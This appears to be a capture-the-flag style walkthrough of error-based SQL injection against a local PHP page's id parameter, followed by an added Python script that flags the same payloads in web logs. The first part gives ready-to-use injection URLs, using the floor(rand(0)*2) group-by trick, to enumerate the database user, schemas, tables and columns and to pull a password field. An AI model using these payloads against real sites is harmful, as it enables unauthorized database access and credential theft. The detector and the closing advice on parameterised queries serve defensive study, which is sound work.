http://127.0.0.1/index.php?id=1
http://127.0.0.1/index.php?id=1'
Check the number of columns:
http://127.0.0.1/index.php?id=1' order by 3%23
http://127.0.0.1/index.php?id=1' order by 4%23
Error-based injection statement format:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(SQL statement))a from information_schema.tables group by a)b%23
Note:
1,2,3 corresponds to the number of columns found above.
"SQL statement" is the placeholder where the injected SQL query goes.
Check the current database account and its privileges:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select user()))a from information_schema.tables group by a)b%23
Extract the database name:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select schema_name from information_schema.schemata limit 5,1))a from information_schema.tables group by a)b%23
Note:
In limit x,1, x is the offset of the database name to retrieve, counting from 0.
Extract table names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))a from information_schema.tables group by a)b%23
Note:
database() refers to the current database; to query another database, hex-encode its name and use that instead, e.g. table_schema=0x111111111;
limit 0,1 retrieves the first table name; change the 0 to retrieve the others.
Extract column names:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from (select+count(*),concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_schema=database() and table_name=0x11111111 limit 2,1))a from information_schema.tables group by a)b%23
Note:
0x11111111 is the hex encoding of the table name to query;
limit 2,1 retrieves the column at offset 2 (offsets count from 0, as with the database names above).
Extract the password:
http://127.0.0.1/index.php?id=1' and 1=2 union select 1,2,3 from(select+count(*),concat(floor(rand(0)*2),(select pwd from user))a from information_schema.tables group by a)b%23
This yields the final key.
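As an added example (not part of the original note), the following Python scans web-server request lines for the signature of this double-query technique: the quote break, union select, the floor(rand(0)*2) ... group by construct and information_schema references. The log lines are constructed for illustration and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample request lines (not from any real server); line 3 carries the
# user() payload from the note above, percent-encoded the way a server would log it.
SAMPLE_LOG = """\
GET /index.php?id=1 HTTP/1.1
GET /index.php?id=1%27%20order%20by%204%23 HTTP/1.1
GET /index.php?id=1%27%20and%201=2%20union%20select%201,2,3%20from(select+count(*),concat(floor(rand(0)*2),(select%20user()))a%20from%20information_schema.tables%20group%20by%20a)b%23 HTTP/1.1
GET /index.php?id=42 HTTP/1.1
"""

# (rule name, regex) pairs, applied to the decoded, lower-cased parameter value.
# The names are hypothetical; the patterns follow the payload shapes in the note.
RULES = [
    ("quote-break",      re.compile(r"'\s*(and|or|order\s+by|union)\b")),
    ("union-select",     re.compile(r"\bunion\s+select\b")),
    ("floor-rand-group", re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.S)),
    ("infoschema",       re.compile(r"\binformation_schema\.")),
    ("order-by-probe",   re.compile(r"\border\s+by\s+\d+")),
]

def decode_params(request_line):
    """Return the decoded (name, value) query pairs of one 'GET /path?qs HTTP/x' line.
    parse_qsl percent-decodes and turns '+' into a space, so select+count(*) and
    select%20count(*) look the same to the rules. %23 becomes a literal '#' in the
    value rather than a fragment, because the URL is split before decoding."""
    parts = request_line.split()
    if len(parts) < 2:
        return []
    return parse_qsl(urlsplit(parts[1]).query, keep_blank_values=True)

def score(value):
    """Return the names of all rules the decoded value matches, in RULES order."""
    v = value.lower()
    return [name for name, rx in RULES if rx.search(v)]

def scan(log_text):
    """Return (line_no, param_name, matched_rules) for every parameter hitting a rule."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for name, value in decode_params(line):
            matched = score(value)
            if matched:
                hits.append((n, name, matched))
    return hits

if __name__ == "__main__":
    for line_no, param, rules in scan(SAMPLE_LOG):
        print(f"line {line_no}: parameter {param!r} matched {', '.join(rules)}")
```

A single rule hit (for example an apostrophe in a name) is noise; the floor-rand-group rule together with infoschema on the same parameter is the pattern worth alerting on, and the real fix on the server side is a parameterised query for id.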